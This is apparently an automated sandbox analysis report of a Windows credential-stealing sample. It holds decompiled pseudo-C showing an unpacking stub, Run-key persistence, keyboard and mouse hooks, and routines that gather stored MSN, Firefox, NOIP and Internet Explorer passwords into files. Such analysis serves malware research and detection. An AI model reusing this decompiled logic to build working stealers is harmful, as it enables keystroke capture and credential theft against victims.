                                    								_t284 =  *0x40d1ec; // 0x40e8ac
                                    								E00401CAC( &_v80, E00401F48( *_t284));
                                    								E00405C4C(0x80000002, _t313, _v80, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", _t394, __eflags, _v76);
                                    							}
                                    							_t258 =  *0x40d1ec; // 0x40e8ac
                                    							E00401CAC( &_v88, E00401F48( *_t258));
                                    							E00406088(0x80000001, _t313, _v88, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", _t394, __eflags,  &_v84, 0);
                                    							E00401E94(_v84,  *_t313);
                                    							if(__eflags != 0) {
                                    								E00401CAC( &_v92, E00401F48( *_t313));
                                    								_t272 =  *0x40d1ec; // 0x40e8ac
                                    								E00401CAC( &_v96, E00401F48( *_t272));
                                    								E00405C4C(0x80000001, _t313, _v96, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", _t394, __eflags, _v92);
                                    							}
                                    						}
                                    						_t191 =  *0x40d1d8; // 0x40e8a4
                                    						__eflags =  *_t191;
                                    						if( *_t191 != 0) {
                                    							_t226 =  *0x40d1d8; // 0x40e8a4
                                    							E00401CAC( &_v104, E00401F48( *_t226));
                                    							E00406088(0x80000002, _t313, _v104, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t394, __eflags,  &_v100, 0);
                                    							E00401E94(_v100,  *_t313);
                                    							if(__eflags != 0) {
                                    								E00401CAC( &_v108, E00401F48( *_t313));
                                    								_t240 =  *0x40d1d8; // 0x40e8a4
                                    								E00401CAC( &_v112, E00401F48( *_t240));
                                    								E00405C4C(0x80000002, _t313, _v112, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t394, __eflags, _v108);
                                    							}
                                    						}
                                    						_t192 =  *0x40d1e0; // 0x40e8a8
                                    						__eflags =  *_t192;
                                    						if( *_t192 != 0) {
                                    							_t204 =  *0x40d1e0; // 0x40e8a8
                                    							E00401CAC( &_v120, E00401F48( *_t204));
                                    							E00406088(0x80000001, _t313, _v120, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t394, __eflags,  &_v116, 0);
                                    							E00401E94(_v116,  *_t313);
                                    							if(__eflags != 0) {
                                    								E00401CAC( &_v124, E00401F48( *_t313));
                                    								_t218 =  *0x40d1e0; // 0x40e8a8
                                    								E00401CAC( &_v128, E00401F48( *_t218));
                                    								E00405C4C(0x80000001, _t313, _v128, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t394, __eflags, _v124);
                                    							}
                                    						}
                                    						_t193 =  *0x40d1e4; // 0x40e8a0
                                    						__eflags =  *_t193;
                                    						if( *_t193 != 0) {
                                    							_push(0x4070fc);
                                    							_push(E00406840(1));
                                    							_push(E00401F48( *_t313));
                                    							_t198 =  *0x40d1e4; // 0x40e8a0
                                    							_t200 = E00401F48( *_t198);
                                    							_pop(_t321);
                                    							_pop(_t201);
                                    							E00406ADC(_t201, _t321, _t200, __eflags);
                                    						}
                                    						L40:
                                    						_pop(_t351);
                                    						 *[fs:eax] = _t351;
                                    						_push(E00407068);
                                    						return E00401AE4( &_v128, 0x1f);
                                    					}
                                    					goto L21;
                                    				}
                                    			}

                                    APIs
                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00406D95
                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00406DEA
                                      • Part of subcall function 00406088: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 004060DD
                                      • Part of subcall function 00406088: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 00406101
                                      • Part of subcall function 00406088: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001), ref: 0040612B
                                      • Part of subcall function 00406088: RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 0040613F
                                      • Part of subcall function 00405C4C: RegCreateKeyA.ADVAPI32(?,00000000,?), ref: 00405C92
                                      • Part of subcall function 00405C4C: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000002,00000000,00000000,00000000,00405CF1), ref: 00405CBA
                                      • Part of subcall function 00405C4C: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000002,00000000,00000000,00000000,00405CF1), ref: 00405CC9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Value$CloseCopyFileQuery$CreateOpen
                                    • String ID: 4h@$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run$Software\Microsoft\Windows\CurrentVersion\Run
                                    • API String ID: 1469814539-1189044031
                                    • Opcode ID: 1733ce09272f468f8cee265a2a4fb179a50cdf102672fd97dcfc76b335fe8140
                                    • Instruction ID: 0337d0d0e41828abccd6a10b42b8af73d9b7eafca3f8209fdc2fdaca8a3f3fd1
                                    • Opcode Fuzzy Hash: 1733ce09272f468f8cee265a2a4fb179a50cdf102672fd97dcfc76b335fe8140
                                    • Instruction Fuzzy Hash: 13E1FC34A041099FDB11EBA9C881A9EB3B5AF45308F60417BF405BB2F6DB38AD45CB59
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 31%
                                    			E004019D8() {
                                    				struct HINSTANCE__* _t24;
                                    				intOrPtr _t32;
                                    				void* _t42;
                                    
                                    				if( *0x0040E5BC != 0 ||  *0x40e024 == 0) {
                                    					L3:
                                    					if( *0x40d004 != 0) {
                                    						 *0x40d068();
                                    					}
                                    					L5:
                                    					while(1) {
                                    						if( *((char*)(0x40e5bc)) == 2 &&  *0x40d000 == 0) {
                                    							 *0x0040E5A0 = 0;
                                    						}
                                    						 *0x40d030();
                                    						if( *((char*)(0x40e5bc)) <= 1 ||  *0x40d000 != 0) {
                                    							if( *0x0040E5A4 != 0) {
                                    								 *0x40d01c();
                                    								_t32 =  *((intOrPtr*)(0x40e5a4));
                                    								_t7 = _t32 + 0x10; // 0x0
                                    								_t24 =  *_t7;
                                    								_t8 = _t32 + 4; // 0x400000
                                    								if(_t24 !=  *_t8 && _t24 != 0) {
                                    									FreeLibrary(_t24);
                                    								}
                                    							}
                                    						}
                                    						 *0x40d034();
                                    						if( *((char*)(0x40e5bc)) == 1) {
                                    							 *0x0040E5B8();
                                    						}
                                    						if( *((char*)(0x40e5bc)) != 0) {
                                    							E004019A8();
                                    						}
                                    						if( *0x40e594 == 0) {
                                    							if( *0x40e014 != 0) {
                                    								 *0x40e014();
                                    							}
                                    							ExitProcess( *0x40d000); // executed
                                    						}
                                    						memcpy(0x40e594,  *0x40e594, 0xb << 2);
                                    						_t42 = _t42 + 0xc;
                                    						0x40d000 = 0x40d000;
                                    					}
                                    				} else {
                                    					do {
                                    						 *0x40e024 = 0;
                                    						 *((intOrPtr*)( *0x40e024))();
                                    					} while ( *0x40e024 != 0);
                                    					goto L3;
                                    				}
                                    			}

                                    APIs
                                    • FreeLibrary.KERNEL32(00400000,?,?,00000002,00401AB2,004011FF,00401247,?,?,?,?,?,?,00402E1B,?), ref: 00401A54
                                    • ExitProcess.KERNEL32(00000000,?,?,00000002,00401AB2,004011FF,00401247,?,?,?,?,?,?,00402E1B,?), ref: 00401A8A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ExitFreeLibraryProcess
                                    • String ID: @&@$@&@$D0@
                                    • API String ID: 1404682716-1618351410
                                    • Opcode ID: 559209a951da750523f00a8a55e47858a0990535697d94cc46877384b3987aa0
                                    • Instruction ID: 5263b8d098c20f51001af61e3d55436e18b8afc55997b24df4f1e0aa037ee43b
                                    • Opcode Fuzzy Hash: 559209a951da750523f00a8a55e47858a0990535697d94cc46877384b3987aa0
                                    • Instruction Fuzzy Hash: 4521AF70A022418FEB209FA5C9887537BE5AF44318F284476D848AA2E2C77CCCC5CF5D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00405EAC(long __eax, CHAR* __edx) {
                                    				long _t4;
                                    				long _t5;
                                    				CHAR* _t7;
                                    
                                    				_t7 = __edx;
                                    				_t5 = __eax;
                                    				GetProcAddress(LoadLibraryA("kernel32.dll"), "GetTempPathA");
                                    				_t4 = GetTempPathA(_t5, _t7); // executed
                                    				return _t4;
                                    			}






                                    0x00405eae
                                    0x00405eb0
                                    0x00405ec2
                                    0x00405ec9
                                    0x00405ecd

                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,GetTempPathA,?,?,0040601D,?,00409E30,00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 00405EBC
                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00405EC2
                                    • GetTempPathA.KERNELBASE(00000105,?,00000000,kernel32.dll,GetTempPathA,?,?,0040601D,?,00409E30,00000000,?), ref: 00405EC9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadPathProcTemp
                                    • String ID: GetTempPathA$kernel32.dll
                                    • API String ID: 1686214323-3269217876
                                    • Opcode ID: ae85f7ca30a4ebc3f898838e590f98755c29af6d739c50bb3d1863989f8de6f9
                                    • Instruction ID: ddb0b176c331170ea1d21e324cbd039c108f0085b782601a862f0faf436c2439
                                    • Opcode Fuzzy Hash: ae85f7ca30a4ebc3f898838e590f98755c29af6d739c50bb3d1863989f8de6f9
                                    • Instruction Fuzzy Hash: CCC08CB121162035E5207AF60C8AE97084CCC842A632408337004F22C294BE1E0000FC
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 83%
                                    			_entry_(void* __eflags, void* __fp0) {
                                    				char _v24;
                                    				char _v28;
                                    				signed int _v32;
                                    				char _v36;
                                    				char _v40;
                                    				char _v44;
                                    				char _v48;
                                    				char _v52;
                                    				char _v56;
                                    				char _v60;
                                    				char _v64;
                                    				char _v68;
                                    				char _v72;
                                    				char _v76;
                                    				char _v80;
                                    				char _v84;
                                    				char _v88;
                                    				char _v92;
                                    				char _v128;
                                    				void* _t64;
                                    				void* _t65;
                                    				signed int _t66;
                                    				intOrPtr _t67;
                                    				intOrPtr _t68;
                                    				signed int _t70;
                                    				signed int _t71;
                                    				unsigned int _t72;
                                    				char _t82;
                                    				signed char* _t84;
                                    				long _t85;
                                    				char* _t88;
                                    				void* _t92;
                                    				long _t93;
                                    				void* _t95;
                                    				void* _t98;
                                    				intOrPtr* _t108;
                                    				void* _t111;
                                    				long _t112;
                                    				char* _t123;
                                    				intOrPtr* _t136;
                                    				long _t140;
                                    				intOrPtr* _t143;
                                    				long _t147;
                                    				intOrPtr* _t150;
                                    				long _t154;
                                    				struct HINSTANCE__* _t157;
                                    				struct HINSTANCE__* _t160;
                                    				signed int _t163;
                                    				signed int _t255;
                                    				signed int _t259;
                                    				signed int _t260;
                                    				signed int _t261;
                                    				signed int _t262;
                                    				void* _t266;
                                    				void* _t267;
                                    				void* _t268;
                                    				void* _t269;
                                    				char* _t271;
                                    				signed int _t272;
                                    				signed int _t274;
                                    				void* _t277;
                                    				void* _t278;
                                    				void* _t279;
                                    				void* _t280;
                                    				void* _t281;
                                    				void* _t282;
                                    				void* _t283;
                                    				intOrPtr* _t285;
                                    				intOrPtr _t291;
                                    				signed int _t316;
                                    				unsigned int* _t317;
                                    				CHAR* _t319;
                                    				void* _t320;
                                    				char* _t321;
                                    				signed int _t322;
                                    				unsigned int* _t323;
                                    				signed int _t324;
                                    				struct HINSTANCE__* _t325;
                                    				unsigned int _t326;
                                    				intOrPtr _t327;
                                    				DWORD* _t328;
                                    				intOrPtr _t329;
                                    				void* _t330;
                                    				signed int _t332;
                                    				void* _t335;
                                    
                                    				_t335 = __fp0;
                                    				_t330 = __eflags;
                                    				asm("pushad");
                                    				_t322 = 0x412000;
                                    				_t1 = _t322 - 0x11000; // 0x401000
                                    				_t316 = _t1;
                                    				_push(_t316);
                                    				_t325 = _t324 | 0xffffffff;
                                    				while(1) {
                                    					_t259 =  *_t322;
                                    					_t322 = _t322 - 0xfffffffc;
                                    					asm("adc ebx, ebx");
                                    					do {
                                    						if(_t330 < 0) {
                                    							_t64 =  *_t322;
                                    							_t322 = _t322 + 1;
                                    							 *_t316 = _t64;
                                    							_t316 = _t316 + 1;
                                    							__eflags = _t316;
                                    							goto L47;
                                    						}
                                    						_t65 = 1;
                                    						while(1) {
                                    							_t260 = _t259 + _t259;
                                    							if(_t260 == 0) {
                                    								_t260 =  *_t322;
                                    								_t322 = _t322 - 0xfffffffc;
                                    								asm("adc ebx, ebx");
                                    							}
                                    							asm("adc eax, eax");
                                    							_t261 = _t260 + _t260;
                                    							_t332 = _t261;
                                    							if(_t332 >= 0) {
                                    								goto L56;
                                    							}
                                    							L54:
                                    							if(_t332 != 0) {
                                    								L62:
                                    								_t272 = 0;
                                    								_t66 = _t65 - 3;
                                    								__eflags = _t66;
                                    								if(_t66 < 0) {
                                    									_t261 = _t261 + _t261;
                                    									__eflags = _t261;
                                    									if(__eflags == 0) {
                                    										_t261 =  *_t322;
                                    										_t322 = _t322 - 0xfffffffc;
                                    										asm("adc ebx, ebx");
                                    									}
                                    									L67:
                                    									if(__eflags < 0) {
                                    										L59:
                                    										_t259 = _t261 + _t261;
                                    										__eflags = _t259;
                                    										if(_t259 == 0) {
                                    											_t259 =  *_t322;
                                    											_t322 = _t322 - 0xfffffffc;
                                    											asm("adc ebx, ebx");
                                    										}
                                    										asm("adc ecx, ecx");
                                    										L77:
                                    										__eflags = _t325 - 0xfffffb00;
                                    										asm("adc ecx, 0x2");
                                    										_t285 = _t325 + _t316;
                                    										__eflags = _t325 - 0xfffffffc;
                                    										if(_t325 <= 0xfffffffc) {
                                    											do {
                                    												_t67 =  *_t285;
                                    												_t285 = _t285 + 4;
                                    												 *_t316 = _t67;
                                    												_t316 = _t316 + 4;
                                    												_t272 = _t272 - 4;
                                    												__eflags = _t272;
                                    											} while (_t272 > 0);
                                    											_t316 = _t316 + _t272;
                                    											break;
                                    										} else {
                                    											goto L78;
                                    										}
                                    										do {
                                    											L78:
                                    											_t68 =  *_t285;
                                    											_t285 = _t285 + 1;
                                    											 *_t316 = _t68;
                                    											_t316 = _t316 + 1;
                                    											_t272 = _t272 - 1;
                                    											__eflags = _t272;
                                    										} while (_t272 != 0);
                                    										break;
                                    									}
                                    									_t272 = _t272 + 1;
                                    									_t261 = _t261 + _t261;
                                    									__eflags = _t261;
                                    									if(__eflags == 0) {
                                    										_t261 =  *_t322;
                                    										_t322 = _t322 - 0xfffffffc;
                                    										asm("adc ebx, ebx");
                                    									}
                                    									if(__eflags < 0) {
                                    										goto L59;
                                    									} else {
                                    										goto L71;
                                    										do {
                                    											do {
                                    												L71:
                                    												_t262 = _t261 + _t261;
                                    												__eflags = _t262;
                                    												if(_t262 == 0) {
                                    													_t262 =  *_t322;
                                    													_t322 = _t322 - 0xfffffffc;
                                    													asm("adc ebx, ebx");
                                    												}
                                    												asm("adc ecx, ecx");
                                    												_t261 = _t262 + _t262;
                                    												__eflags = _t261;
                                    											} while (__eflags >= 0);
                                    											if(__eflags != 0) {
                                    												break;
                                    											}
                                    											_t261 =  *_t322;
                                    											_t322 = _t322 - 0xfffffffc;
                                    											__eflags = _t322;
                                    											asm("adc ebx, ebx");
                                    										} while (_t322 >= 0);
                                    										_t272 = _t272 + 2;
                                    										__eflags = _t272;
                                    										goto L77;
                                    									}
                                    								}
                                    								_t70 =  *_t322;
                                    								_t322 = _t322 + 1;
                                    								_t71 = _t70 ^ 0xffffffff;
                                    								__eflags = _t71;
                                    								if(__eflags == 0) {
                                    									_pop(_t323);
                                    									_t317 = _t323;
                                    									goto L83;
                                    									do {
                                    										do {
                                    											L83:
                                    											_t72 =  *_t317;
                                    											_t317 =  &(_t317[0]);
                                    											__eflags = _t72 - 0xe8 - 1;
                                    										} while (_t72 - 0xe8 > 1);
                                    										__eflags =  *_t317 - 1;
                                    									} while ( *_t317 != 1);
                                    									asm("rol eax, 0x10");
                                    									 *_t317 = ( *_t317 >> 8) - _t317 + _t323;
                                    									__eflags =  &(_t317[1]);
                                    									asm("loop 0xffffffdb");
                                    									_t50 =  &(_t323[0x13c00]); // 0x450000
                                    									_t319 = _t50;
                                    									while(1) {
                                    										L86:
                                    										_t82 =  *_t319;
                                    										__eflags = _t82;
                                    										if(_t82 == 0) {
                                    											break;
                                    										}
                                    										_t51 =  &(_t319[4]); // 0xf1ec
                                    										_t271 = _t323 +  *_t51;
                                    										_t321 =  &(_t319[8]);
                                    										__eflags = _t321;
                                    										_t325 = LoadLibraryA( &(_t323[0x156c2]) + _t82);
                                    										while(1) {
                                    											_t319 =  &(_t321[1]);
                                    											_t255 =  *_t321;
                                    											__eflags = _t255;
                                    											if(_t255 == 0) {
                                    												goto L86;
                                    											}
                                    											asm("repne scasb");
                                    											_t82 = GetProcAddress(_t325, _t319);
                                    											__eflags = _t82;
                                    											if(_t82 == 0) {
                                    												ExitProcess();
                                    											}
                                    											 *_t271 = _t82;
                                    											_t271 =  &(_t271[4]);
                                    										}
                                    									}
                                    									_t326 = _t323[0x156f6];
                                    									_t59 = _t323 - 0x1000; // 0x400000
                                    									_t320 = _t59;
                                    									VirtualProtect(_t320, 0x1000, 4, _t328);
                                    									_t60 = _t320 + 0x21f; // 0x40021f
                                    									_t84 = _t60;
                                    									 *_t84 =  *_t84 & 0x0000007f;
                                    									_t61 =  &(_t84[0x28]);
                                    									 *_t61 = _t84[0x28] & 0x0000007f;
                                    									__eflags =  *_t61;
                                    									_t85 = _t82;
                                    									_push(_t85);
                                    									VirtualProtect(_t320, 0x1000, _t85, _t328); // executed
                                    									asm("popad");
                                    									_t88 =  &_v128;
                                    									do {
                                    										_push(0);
                                    										__eflags = _t328 - _t88;
                                    									} while (_t328 != _t88);
                                    									_t329 = _t328 - 0xffffff80;
                                    									_push(_t326);
                                    									_t327 = _t329;
                                    									_t274 = 0xb;
                                    									do {
                                    										_push(0);
                                    										_push(0);
                                    										_t274 = _t274 - 1;
                                    										__eflags = _t274;
                                    									} while (_t274 != 0);
                                    									_push(0x1000);
                                    									E00403418(0x40bb04);
                                    									_push(_t327);
                                    									_push(0x40c0c4);
                                    									_push( *[fs:eax]);
                                    									 *[fs:eax] = _t329;
                                    									_t92 = E00403568(0, 0, "_x_X_UPDATE_X_x_"); // executed
                                    									_t266 = _t92;
                                    									_t93 = GetLastError();
                                    									__eflags = _t93 - 0xb7;
                                    									if(_t93 != 0xb7) {
                                    										CloseHandle(_t266); // executed
                                    									} else {
                                    										CloseHandle(_t266);
                                    										Sleep(0x2ee0);
                                    									}
                                    									_t95 = E00403568(0, 0, "_x_X_PASSWORDLIST_X_x_"); // executed
                                    									_t267 = _t95;
                                    									__eflags = GetLastError() - 0xb7;
                                    									if(__eflags != 0) {
                                    										CloseHandle(_t267);
                                    										_t98 = E00403568(0, 0, "_x_X_BLOCKMOUSE_X_x_"); // executed
                                    										_t268 = _t98;
                                    										__eflags = GetLastError() - 0xb7;
                                    										if(__eflags != 0) {
                                    											CloseHandle(_t268);
                                    											L27:
                                    											E004013A4(1,  &_v80);
                                    											_t287 = "Restart";
                                    											E00401E94(_v80, "Restart");
                                    											if(__eflags != 0) {
                                    												Sleep(0x3e8); // executed
                                    											}
                                    											E00404604(_t274, __eflags);
                                    											E0040491C();
                                    											E0040B118(_t287, _t320, _t323);
                                    											_t108 =  *0x40d204; // 0x40e8f8
                                    											_t111 = E00403568(0, 0, E00401F48( *_t108)); // executed
                                    											_t269 = _t111;
                                    											_t112 = GetLastError();
                                    											__eflags = _t112 - 0xb7;
                                    											if(_t112 != 0xb7) {
                                    												CloseHandle(_t269); // executed
                                    											} else {
                                    												CloseHandle(_t269);
                                    												Sleep(0x3e8);
                                    												_t136 =  *0x40d204; // 0x40e8f8
                                    												_t269 = E00403568(0, 0, E00401F48( *_t136));
                                    												_t140 = GetLastError();
                                    												__eflags = _t140 - 0xb7;
                                    												if(_t140 != 0xb7) {
                                    													CloseHandle(_t269);
                                    												} else {
                                    													CloseHandle(_t269);
                                    													Sleep(0x3e8);
                                    													_t143 =  *0x40d204; // 0x40e8f8
                                    													_t269 = E00403568(0, 0, E00401F48( *_t143));
                                    													_t147 = GetLastError();
                                    													__eflags = _t147 - 0xb7;
                                    													if(_t147 != 0xb7) {
                                    														CloseHandle(_t269);
                                    													} else {
                                    														CloseHandle(_t269);
                                    														Sleep(0x3e8);
                                    														_t150 =  *0x40d204; // 0x40e8f8
                                    														_t269 = E00403568(0, 0, E00401F48( *_t150));
                                    														_t154 = GetLastError();
                                    														__eflags = _t154 - 0xb7;
                                    														if(_t154 != 0xb7) {
                                    															CloseHandle(_t269);
                                    														} else {
                                    															ExitProcess(0);
                                    														}
                                    													}
                                    												}
                                    											}
                                    											__eflags =  *((char*)( *0x40d1dc)) - 1;
                                    											if( *((char*)( *0x40d1dc)) != 1) {
                                    												__eflags = 0;
                                    												E004013A4(0, 0x40f1e8);
                                    											} else {
                                    												E004013A4(0,  &_v88);
                                    												E00406B54(_v88, _t269,  &_v84, _t320, _t323); // executed
                                    												E00401B14(0x40f1e8, _v84);
                                    											}
                                    											E00406008( &_v92);
                                    											E00401D58( &_v92, "XX--XX--XX.txt");
                                    											E0040B93C( *0x40f1e8, _t269, _v92, _t320, _t323, __eflags);
                                    											_t123 =  *0x40d214; // 0x40e8f4
                                    											__eflags =  *_t123 - 1;
                                    											if(__eflags == 0) {
                                    												E0040B7FC(_t269, _t320, _t323, __eflags);
                                    												Sleep(0x3e8); // executed
                                    											}
                                    											E0040B3C0(_t269, _t274, _t320, _t323); // executed
                                    											L44:
                                    											__eflags = 0;
                                    											_pop(_t291);
                                    											 *[fs:eax] = _t291;
                                    											_push(0x40c0cb);
                                    											return E00401AE4( &_v92, 0x12);
                                    										}
                                    										CloseHandle(_t268);
                                    										_t157 =  *0x40e670; // 0x400000
                                    										SetWindowsHookExA(0xd, E0040B0B8, _t157, 0);
                                    										_t160 =  *0x40e670; // 0x400000
                                    										SetWindowsHookExA(0xe, E0040B108, _t160, 0);
                                    										while(1) {
                                    											_t163 = E0040BA84(__eflags);
                                    											__eflags = _t163;
                                    											if(_t163 != 0) {
                                    												break;
                                    											}
                                    											E00405918();
                                    										}
                                    										ExitProcess(0);
                                    										goto L27;
                                    									}
                                    									CloseHandle(_t267);
                                    									E00409AD4( &_v24, _t267, _t323, __eflags);
                                    									E00401B14(0x40f1ec, _v24);
                                    									__eflags =  *0x40f1ec;
                                    									if( *0x40f1ec != 0) {
                                    										_push(E00401D50( *0x40f1ec));
                                    										E00406008( &_v28);
                                    										E00401D58( &_v28, "NOIP.abc");
                                    										_pop(_t283);
                                    										E00405D70(_v28, _t267, _t283,  *0x40f1ec, _t323, __eflags);
                                    									}
                                    									E00409D28( &_v32, _t267, _t320, _t323);
                                    									_t297 = _v32;
                                    									E00401B14(0x40f1ec, _v32);
                                    									__eflags =  *0x40f1ec;
                                    									if( *0x40f1ec != 0) {
                                    										_push(E00401D50( *0x40f1ec));
                                    										E00406008( &_v36);
                                    										E00401D58( &_v36, "MSN.abc");
                                    										_t297 =  *0x40f1ec;
                                    										_pop(_t282);
                                    										E00405D70(_v36, _t267, _t282,  *0x40f1ec, _t323, __eflags);
                                    									}
                                    									E00409EF8( &_v40, _t267, _t297, _t320, _t323);
                                    									E00401B14(0x40f1ec, _v40);
                                    									__eflags =  *0x40f1ec;
                                    									if( *0x40f1ec != 0) {
                                    										_push(E00401D50( *0x40f1ec));
                                    										E00406008( &_v44);
                                    										E00401D58( &_v44, "FIREFOX.abc");
                                    										_pop(_t281);
                                    										E00405D70(_v44, _t267, _t281,  *0x40f1ec, _t323, __eflags);
                                    									}
                                    									E00409A84( &_v48);
                                    									E00401B14(0x40f1ec, _v48);
                                    									__eflags =  *0x40f1ec;
                                    									if( *0x40f1ec != 0) {
                                    										_push(E00401D50( *0x40f1ec));
                                    										E00406008( &_v52);
                                    										E00401D58( &_v52, "IELOGIN.abc");
                                    										_pop(_t280);
                                    										E00405D70(_v52, _t267, _t280,  *0x40f1ec, _t323, __eflags);
                                    									}
                                    									E00409A90( &_v56);
                                    									E00401B14(0x40f1ec, _v56);
                                    									__eflags =  *0x40f1ec;
                                    									if(__eflags != 0) {
                                    										_push(E00401D50( *0x40f1ec));
                                    										E00406008( &_v60);
                                    										E00401D58( &_v60, "IEPASS.abc");
                                    										_pop(_t279);
                                    										E00405D70(_v60, _t267, _t279,  *0x40f1ec, _t323, __eflags);
                                    									}
                                    									E00409A9C( &_v64, _t320, _t323, __eflags, _t335);
                                    									E00401B14(0x40f1ec, _v64);
                                    									__eflags =  *0x40f1ec;
                                    									if(__eflags != 0) {
                                    										_push(E00401D50( *0x40f1ec));
                                    										E00406008( &_v68);
                                    										E00401D58( &_v68, "IEAUTO.abc");
                                    										_pop(_t278);
                                    										E00405D70(_v68, _t267, _t278,  *0x40f1ec, _t323, __eflags);
                                    									}
                                    									E00409AB8( &_v72, _t320, _t323, __eflags);
                                    									E00401B14(0x40f1ec, _v72);
                                    									__eflags =  *0x40f1ec;
                                    									if( *0x40f1ec != 0) {
                                    										_push(E00401D50( *0x40f1ec));
                                    										E00406008( &_v76);
                                    										E00401D58( &_v76, "IEWEB.abc");
                                    										_pop(_t277);
                                    										E00405D70(_v76, _t267, _t277,  *0x40f1ec, _t323, __eflags);
                                    									}
                                    									goto L44;
                                    								}
                                    								_t325 = _t71 >> 1;
                                    								goto L67;
                                    							}
                                    							_t261 =  *_t322;
                                    							_t322 = _t322 - 0xfffffffc;
                                    							asm("adc ebx, ebx");
                                    							if(_t322 < 0) {
                                    								goto L62;
                                    							}
                                    							L56:
                                    							_t65 = _t65 - 1;
                                    							_t259 = _t261 + _t261;
                                    							if(_t259 == 0) {
                                    								_t259 =  *_t322;
                                    								_t322 = _t322 - 0xfffffffc;
                                    								asm("adc ebx, ebx");
                                    							}
                                    							asm("adc eax, eax");
                                    							_t260 = _t259 + _t259;
                                    							if(_t260 == 0) {
                                    								_t260 =  *_t322;
                                    								_t322 = _t322 - 0xfffffffc;
                                    								asm("adc ebx, ebx");
                                    							}
                                    							asm("adc eax, eax");
                                    							_t261 = _t260 + _t260;
                                    							_t332 = _t261;
                                    							if(_t332 >= 0) {
                                    								goto L56;
                                    							}
                                    						}
                                    						L47:
                                    						_t259 = _t259 + _t259;
                                    						__eflags = _t259;
                                    					} while (_t259 != 0);
                                    				}
                                    			}
                                    0x00455c10
                                    0x00455c10
                                    0x00455c10
                                    0x00455c11
                                    0x00455c16
                                    0x00455c16
                                    0x00455c1c
                                    0x00455c1d
                                    0x00455c32
                                    0x00455c32
                                    0x00455c34
                                    0x00455c37
                                    0x00455c39
                                    0x00455c39
                                    0x00455c28
                                    0x00455c2a
                                    0x00455c2b
                                    0x00455c2d
                                    0x00455c2d
                                    0x00000000
                                    0x00455c2d
                                    0x00455c3b
                                    0x00455c40
                                    0x00455c40
                                    0x00455c42
                                    0x00455c44
                                    0x00455c46
                                    0x00455c49
                                    0x00455c49
                                    0x00455c4b
                                    0x00455c4d
                                    0x00455c4d
                                    0x00455c4f
                                    0x00000000
                                    0x00000000
                                    0x00455c51
                                    0x00455c51
                                    0x00455c7b
                                    0x00455c7b
                                    0x00455c7d
                                    0x00455c7d
                                    0x00455c80
                                    0x00455c93
                                    0x00455c93
                                    0x00455c95
                                    0x00455c97
                                    0x00455c99
                                    0x00455c9c
                                    0x00455c9c
                                    0x00455c9e
                                    0x00455c9e
                                    0x00455c6c
                                    0x00455c6c
                                    0x00455c6c
                                    0x00455c6e
                                    0x00455c70
                                    0x00455c72
                                    0x00455c75
                                    0x00455c75
                                    0x00455c77
                                    0x00455ccd
                                    0x00455ccd
                                    0x00455cd3
                                    0x00455cd6
                                    0x00455cd9
                                    0x00455cdc
                                    0x00455cec
                                    0x00455cec
                                    0x00455cee
                                    0x00455cf1
                                    0x00455cf3
                                    0x00455cf6
                                    0x00455cf6
                                    0x00455cf6
                                    0x00455cfb
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00455cde
                                    0x00455cde
                                    0x00455cde
